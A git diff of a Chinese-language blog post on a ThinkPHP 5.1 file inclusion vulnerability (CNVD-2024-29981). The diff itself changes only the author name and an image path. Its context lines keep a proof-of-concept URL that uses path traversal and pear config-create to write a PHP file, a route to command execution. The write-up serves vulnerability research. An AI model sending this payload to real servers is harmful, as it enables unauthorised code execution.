--- a/_posts/2024-4-24-Thinkphp5.1文件包含-CNVD-2024-29981.md
+++ b/_posts/2024-4-24-Thinkphp5.1文件包含-CNVD-2024-29981.md
@@ -1,7 +1,7 @@
 ---
 layout: post
 title: "Thinkphp5.1文件包含-CNVD-2024-29981"
-author: "xinyisleep"
+author: "XinYiSleep"
 ---
 ```info
 time:   4.24
@@ -12,7 +12,7 @@ php:    7.3.4<br>
 pear进行命令执行poc:  /index.php?s=..\..\..\Extensions\php\php7.3.4nts\pear\&+config-create+/<?=phpinfo();?>+1.php
 ```
 调用堆栈：
-![image](https://xinyisleep.github.io/2024/thinkphp5/1743331415510.jpg)
+![image](https://xinyisleep.github.io/img/2024/thinkphp5/1743331415510.jpg)
 <h1 id="tvbAq">一.Thinkphp文件包含:</h1>
 **<font style="color:#000000;">在Thinkphp5中路由可以使用一下两种方式都可以访问到执行的方法中如： </font>**
 
